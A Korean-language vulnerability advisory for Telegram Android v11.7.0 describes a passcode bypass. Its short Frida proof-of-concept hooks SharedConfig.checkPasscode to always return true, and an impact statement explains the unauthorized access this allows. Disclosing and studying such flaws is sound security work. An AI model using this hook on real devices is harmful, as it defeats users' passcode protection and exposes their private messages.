
SharedConfig.checkPasscode를 후킹하여 항상 true를 반환하도록 함으로써 Telegram Android의 인증 우회를 시연하는 Frida 기반 개념 증명으로, 무단 액세스를 가능하게 합니다.
Telegram Android APK v.11.7.0의 SharedConfig 클래스에서 발생한 문제로, 물리적으로 근접한 공격자가 checkPasscode 메서드의 반환 값을 조작하여 인증을 우회하고 권한을 상승시킬 수 있습니다.
인증 우회
Telegram
Telegram android apk v.11.7.0
org.telegram.messenger.SharedConfig
Java.perform(function() {
// Locate the SharedConfig class in the target application
var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');
// Hook the checkPasscode method to modify its behavior
PassCodeActivity.checkPasscode.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true
return true;
};
});
https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing
이 취약점은 클라이언트 측 인증 우회 문제입니다. 이는 민감한 데이터를 보호하거나 특정 앱 기능에 대한 접근을 제한하기 위해 암호 기능에 의존하는 사용자에게 영향을 미칩니다. 이 결함을 악용하여 물리적으로 근접한 공격자가 암호 확인 프로세스를 조작하고, 인증을 우회하며, 앱의 보호된 영역에 무단 액세스할 수 있습니다. 이는 민감한 사용자 데이터의 노출이나 애플리케이션 내 무단 작업으로 이어질 수 있습니다.